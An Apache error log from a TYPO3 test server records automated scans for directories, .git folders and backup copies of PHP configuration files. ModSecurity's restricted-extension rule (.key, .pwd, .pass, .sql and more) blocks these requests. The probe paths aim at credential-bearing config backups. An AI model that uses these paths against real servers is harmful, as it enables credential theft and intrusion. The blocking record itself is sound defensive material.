[Sat Mar 30 23:53:04.058224 2024] [authz_core:error] [pid 2140884] [client 91.215.85.43:43306] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/git
[Sat Mar 30 23:53:04.062286 2024] [authz_core:error] [pid 2140628] [client 91.215.85.43:43322] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/live
[Sat Mar 30 23:53:04.065580 2024] [authz_core:error] [pid 2143542] [client 91.215.85.43:43336] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/m
[Sat Mar 30 23:53:04.073913 2024] [authz_core:error] [pid 2143544] [client 91.215.85.43:43342] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/alpha
[Sat Mar 30 23:53:04.086065 2024] [authz_core:error] [pid 2140505] [client 91.215.85.43:43332] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/__MACOSX
[Sat Mar 30 23:53:04.105375 2024] [authz_core:error] [pid 2140506] [client 91.215.85.43:43324] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/api
[Sat Mar 30 23:53:04.106991 2024] [authz_core:error] [pid 2140509] [client 91.215.85.43:43338] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/new
[Sat Mar 30 23:53:04.121518 2024] [authz_core:error] [pid 2140507] [client 91.215.85.43:43352] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/app
[Sat Mar 30 23:53:04.158272 2024] [authz_core:error] [pid 2140508] [client 91.215.85.43:43372] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/api
[Sat Mar 30 23:53:04.163337 2024] [authz_core:error] [pid 2140628] [client 91.215.85.43:43398] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/public
[Sat Mar 30 23:53:04.163772 2024] [authz_core:error] [pid 2143542] [client 91.215.85.43:43412] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/qa
[Sat Mar 30 23:53:04.165578 2024] [authz_core:error] [pid 2140884] [client 91.215.85.43:43356] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/node_modules
[Sat Mar 30 23:53:04.166181 2024] [authz_core:error] [pid 2140504] [client 91.215.85.43:43384] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/old-cuburn
[Sat Mar 30 23:53:04.171575 2024] [authz_core:error] [pid 2143544] [client 91.215.85.43:43438] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/repository
[Sat Mar 30 23:53:04.188599 2024] [authz_core:error] [pid 2140505] [client 91.215.85.43:43424] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/repos
[Sat Mar 30 23:53:04.207829 2024] [authz_core:error] [pid 2140509] [client 91.215.85.43:43460] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/samples
[Sat Mar 30 23:53:04.210516 2024] [authz_core:error] [pid 2140506] [client 91.215.85.43:43454] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/s3
[Sat Mar 30 23:53:04.225779 2024] [authz_core:error] [pid 2140507] [client 91.215.85.43:43474] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/shop
[Sat Mar 30 23:53:04.244908 2024] [authz_core:error] [pid 2160205] [client 91.215.85.43:43478] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/site
[Sat Mar 30 23:53:04.253992 2024] [authz_core:error] [pid 2140508] [client 91.215.85.43:43500] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/staging
[Sat Mar 30 23:53:04.264664 2024] [authz_core:error] [pid 2140628] [client 91.215.85.43:43518] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/store
[Sat Mar 30 23:53:04.267285 2024] [authz_core:error] [pid 2143542] [client 91.215.85.43:43488] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/amphtml
[Sat Mar 30 23:53:04.268691 2024] [authz_core:error] [pid 2140504] [client 91.215.85.43:43492] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/src
[Sat Mar 30 23:53:04.269875 2024] [authz_core:error] [pid 2140884] [client 91.215.85.43:43510] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/static
[Sat Mar 30 23:53:04.271514 2024] [authz_core:error] [pid 2143544] [client 91.215.85.43:43530] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/test
[Sat Mar 30 23:53:04.291840 2024] [authz_core:error] [pid 2140505] [client 91.215.85.43:43534] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/user
[Sat Mar 30 23:53:04.309980 2024] [authz_core:error] [pid 2140509] [client 91.215.85.43:43538] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/v1
[Sat Mar 30 23:53:04.315810 2024] [authz_core:error] [pid 2140506] [client 91.215.85.43:43552] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/v2
[Sat Mar 30 23:53:04.328852 2024] [authz_core:error] [pid 2140507] [client 91.215.85.43:43560] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/v3
[Sat Mar 30 23:53:04.350516 2024] [authz_core:error] [pid 2160205] [client 91.215.85.43:43566] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/vendor
[Sat Mar 30 23:53:04.353393 2024] [authz_core:error] [pid 2140508] [client 91.215.85.43:43578] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/web
[Sat Mar 30 23:53:04.360834 2024] [authz_core:error] [pid 2140628] [client 91.215.85.43:43616] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/wp-content
[Sat Mar 30 23:53:04.374139 2024] [authz_core:error] [pid 2140884] [client 91.215.85.43:43626] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/wp-content
[Sat Mar 30 23:53:04.375423 2024] [authz_core:error] [pid 2143542] [client 91.215.85.43:43592] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/wiki
[Sat Mar 30 23:53:04.377190 2024] [authz_core:error] [pid 2143544] [client 91.215.85.43:43642] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/wp-includes
[Sat Mar 30 23:53:04.378458 2024] [authz_core:error] [pid 2140504] [client 91.215.85.43:43608] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/wp-content
[Sun Mar 31 08:25:44.938325 2024] [authz_core:error] [pid 2163525] [client 193.32.162.87:60354] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Wed Apr 03 01:28:43.778809 2024] [authz_core:error] [pid 2226425] [client 54.153.68.27:55094] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Fri Apr 05 03:01:44.470633 2024] [:error] [pid 2272635] [client 91.215.85.29:51736] [client 91.215.85.29] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/Application/Common/Conf/config.php.backup"] [unique_id "Zg9NeGi0jWz5YPncRIL-7QAAAAM"]
[Fri Apr 05 03:01:44.471032 2024] [:error] [pid 2272635] [client 91.215.85.29:51736] [client 91.215.85.29] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/Application/Common/Conf/config.php.backup"] [unique_id "Zg9NeGi0jWz5YPncRIL-7QAAAAM"]
[Fri Apr 05 03:01:44.471199 2024] [:error] [pid 2272635] [client 91.215.85.29:51736] [client 91.215.85.29] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/Application/Common/Conf/config.php.backup"] [unique_id "Zg9NeGi0jWz5YPncRIL-7QAAAAM"]
[Fri Apr 05 03:01:44.478466 2024] [:error] [pid 2272636] [client 91.215.85.29:51734] [client 91.215.85.29] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/app/etc/env.php.backup"] [unique_id "Zg9NeO7eMoB0OR9e06enogAAAAQ"]
[Fri Apr 05 03:01:44.479045 2024] [:error] [pid 2272636] [client 91.215.85.29:51734] [client 91.215.85.29] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app/etc/env.php.backup"] [unique_id "Zg9NeO7eMoB0OR9e06enogAAAAQ"]
[Fri Apr 05 03:01:44.479305 2024] [:error] [pid 2272636] [client 91.215.85.29:51734] [client 91.215.85.29] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app/etc/env.php.backup"] [unique_id "Zg9NeO7eMoB0OR9e06enogAAAAQ"]
[Fri Apr 05 03:01:44.567512 2024] [authz_core:error] [pid 2272633] [client 91.215.85.29:51750] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/app
[Fri Apr 05 03:01:44.578672 2024] [authz_core:error] [pid 2272637] [client 91.215.85.29:51772] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/app
[Fri Apr 05 03:01:44.789620 2024] [:error] [pid 2272633] [client 91.215.85.29:51812] [client 91.215.85.29] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/app/etc/env.php.old"] [unique_id "Zg9NePUzfkmOvnEGQl8h-gAAAAE"]
[Fri Apr 05 03:01:44.790046 2024] [:error] [pid 2272633] [client 91.215.85.29:51812] [client 91.215.85.29] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app/etc/env.php.old"] [unique_id "Zg9NePUzfkmOvnEGQl8h-gAAAAE"]
[Fri Apr 05 03:01:44.790229 2024] [:error] [pid 2272633] [client 91.215.85.29:51812] [client 91.215.85.29] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app/etc/env.php.old"] [unique_id "Zg9NePUzfkmOvnEGQl8h-gAAAAE"]
[Fri Apr 05 03:01:45.343190 2024] [:error] [pid 2272634] [client 91.215.85.29:51990] [client 91.215.85.29] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/config/config_global.php.backup"] [unique_id "Zg9NeUpp3m0IkOTL-p_qJAAAAAI"]
[Fri Apr 05 03:01:45.343629 2024] [:error] [pid 2272634] [client 91.215.85.29:51990] [client 91.215.85.29] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/config/config_global.php.backup"] [unique_id "Zg9NeUpp3m0IkOTL-p_qJAAAAAI"]
[Fri Apr 05 03:01:45.343795 2024] [:error] [pid 2272634] [client 91.215.85.29:51990] [client 91.215.85.29] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/config/config_global.php.backup"] [unique_id "Zg9NeUpp3m0IkOTL-p_qJAAAAAI"]
[Fri Apr 05 03:01:45.348555 2024] [authz_core:error] [pid 2272635] [client 91.215.85.29:51938] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/common
[Fri Apr 05 03:01:45.485563 2024] [:error] [pid 2272632] [client 91.215.85.29:52228] [client 91.215.85.29] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/data/bbscache/config.php.backup"] [unique_id "Zg9NeRd3u0Yvuu6g37bWeAAAAAA"]
[Fri Apr 05 03:01:45.485991 2024] [:error] [pid 2272632] [client 91.215.85.29:52228] [client 91.215.85.29] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/data/bbscache/config.php.backup"] [unique_id "Zg9NeRd3u0Yvuu6g37bWeAAAAAA"]
[Fri Apr 05 03:01:45.492949 2024] [:error] [pid 2272632] [client 91.215.85.29:52228] [client 91.215.85.29] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/data/bbscache/config.php.backup"] [unique_id "Zg9NeRd3u0Yvuu6g37bWeAAAAAA"]
[Fri Apr 05 03:01:45.581662 2024] [:error] [pid 2272634] [client 91.215.85.29:52118] [client 91.215.85.29] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/config/config_ucenter.php.old"] [unique_id "Zg9NeUpp3m0IkOTL-p_qJgAAAAI"]
[Fri Apr 05 03:01:45.582050 2024] [:error] [pid 2272634] [client 91.215.85.29:52118] [client 91.215.85.29] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/config/config_ucenter.php.old"] [unique_id "Zg9NeUpp3m0IkOTL-p_qJgAAAAI"]
[Fri Apr 05 03:01:45.582196 2024] [:error] [pid 2272634] [client 91.215.85.29:52118] [client 91.215.85.29] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/config/config_ucenter.php.old"] [unique_id "Zg9NeUpp3m0IkOTL-p_qJgAAAAI"]
[Fri Apr 05 03:01:45.589328 2024] [:error] [pid 2272632] [client 91.215.85.29:52104] [client 91.215.85.29] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/config/config_ucenter.php.backup"] [unique_id "Zg9NeRd3u0Yvuu6g37bWeQAAAAA"]
[Fri Apr 05 03:01:45.589708 2024] [:error] [pid 2272632] [client 91.215.85.29:52104] [client 91.215.85.29] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/config/config_ucenter.php.backup"] [unique_id "Zg9NeRd3u0Yvuu6g37bWeQAAAAA"]
[Fri Apr 05 03:01:45.589900 2024] [:error] [pid 2272632] [client 91.215.85.29:52104] [client 91.215.85.29] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/config/config_ucenter.php.backup"] [unique_id "Zg9NeRd3u0Yvuu6g37bWeQAAAAA"]
[Fri Apr 05 03:01:45.611432 2024] [authz_core:error] [pid 2273014] [client 91.215.85.29:52108] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Fri Apr 05 03:01:45.633272 2024] [authz_core:error] [pid 2272633] [client 91.215.85.29:52336] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/data
[Fri Apr 05 03:01:45.705683 2024] [:error] [pid 2273014] [client 91.215.85.29:52564] [client 91.215.85.29] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/e/class/config.php.old"] [unique_id "Zg9NedqZi0hNKs0Q6mN6bgAAAAY"]
[Fri Apr 05 03:01:45.706036 2024] [:error] [pid 2273014] [client 91.215.85.29:52564] [client 91.215.85.29] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/e/class/config.php.old"] [unique_id "Zg9NedqZi0hNKs0Q6mN6bgAAAAY"]
[Fri Apr 05 03:01:45.706195 2024] [:error] [pid 2273014] [client 91.215.85.29:52564] [client 91.215.85.29] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/e/class/config.php.old"] [unique_id "Zg9NedqZi0hNKs0Q6mN6bgAAAAY"]
[Fri Apr 05 03:01:45.743880 2024] [authz_core:error] [pid 2272636] [client 91.215.85.29:52032] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
